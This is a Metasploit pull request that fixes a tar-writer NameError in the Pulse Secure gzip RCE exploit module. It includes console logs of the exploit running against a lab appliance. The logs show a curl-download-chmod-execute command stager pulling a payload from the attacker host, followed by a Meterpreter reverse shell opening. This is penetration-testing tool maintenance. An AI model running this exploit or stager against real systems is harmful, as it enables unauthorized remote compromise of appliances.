### PR TITLE
Fix Gem::Package NameError with Rex::Tar::Writer (exploit/linux/http/pulse_secure_gzip_rce)

### DIFF
--- a/modules/exploits/linux/http/pulse_secure_gzip_rce.rb
+++ b/modules/exploits/linux/http/pulse_secure_gzip_rce.rb
@@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     PERL
     tarfile = StringIO.new
-    Gem::Package::TarWriter.new(tarfile) do |tar|
+    Rex::Tar::Writer.new(tarfile) do |tar|
       tar.mkdir('tmp', 509)
       tar.mkdir('tmp/tt', 509)
       tar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio|


### PR DESCRIPTION
```
msf6 exploit(linux/http/pulse_secure_gzip_rce) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Version 9.1, revision 8, build 7453 found
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/njlt6ea2wnZQ
[*] Local IP: http://192.168.1.65:8080/njlt6ea2wnZQ
[*] Generated command stager: ["curl -so /tmp/RUbfxpmE http://192.168.123.1:8080/njlt6ea2wnZQ;chmod +x /tmp/RUbfxpmE;/tmp/RUbfxpmE;rm -f /tmp/RUbfxpmE"]
[*] Exploit trigger will be at /dana-na/auth/setcookie.cgi with a header of OPAQIUMH
[-] Exploit failed: NameError uninitialized constant Gem::Package
[*] Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/pulse_secure_gzip_rce) > edit
[*] Launching vim -i NONE /Users/wvu/rapid7/metasploit-framework/modules/exploits/linux/http/pulse_secure_gzip_rce.rb
msf6 exploit(linux/http/pulse_secure_gzip_rce) > git diff
[*] exec: git diff

diff --git a/modules/exploits/linux/http/pulse_secure_gzip_rce.rb b/modules/exploits/linux/http/pulse_secure_gzip_rce.rb
index d7ba4a203a..7a74c1dc2d 100644
--- a/modules/exploits/linux/http/pulse_secure_gzip_rce.rb
+++ b/modules/exploits/linux/http/pulse_secure_gzip_rce.rb
@@ -239,7 +239,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     PERL
     tarfile = StringIO.new
-    Gem::Package::TarWriter.new(tarfile) do |tar|
+    Rex::Tar::Writer.new(tarfile) do |tar|
       tar.mkdir('tmp', 509)
       tar.mkdir('tmp/tt', 509)
       tar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio|
msf6 exploit(linux/http/pulse_secure_gzip_rce) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Other admin sessions detected, continuing
[*] Version 9.1, revision 8, build 7453 found
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/eozPnGvcPDkdf
[*] Local IP: http://192.168.1.65:8080/eozPnGvcPDkdf
[*] Generated command stager: ["curl -so /tmp/pTWPrqlz http://192.168.123.1:8080/eozPnGvcPDkdf;chmod +x /tmp/pTWPrqlz;/tmp/pTWPrqlz;rm -f /tmp/pTWPrqlz"]
[*] Exploit trigger will be at /dana-na/auth/setcookie.cgi with a header of IVYEKGHV
[*] Requesting backup config page
[*] Uploading encrypted config backup
[*] Triggering RCE
[*] Client 192.168.123.254 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3) requested /eozPnGvcPDkdf
[*] Sending payload to 192.168.123.254 (curl/7.19.7 (i686-redhat-linux-gnu) libcurl/7.63.0 OpenSSL/1.0.2n zlib/1.2.3)
[*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.254:59096) at 2021-04-12 19:43:44 -0500
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Logging out to prevent warnings to other admins
[*] Server stopped.

meterpreter >
```

Fixes #14368 with #9726. Probably a regression from Zeitwerk?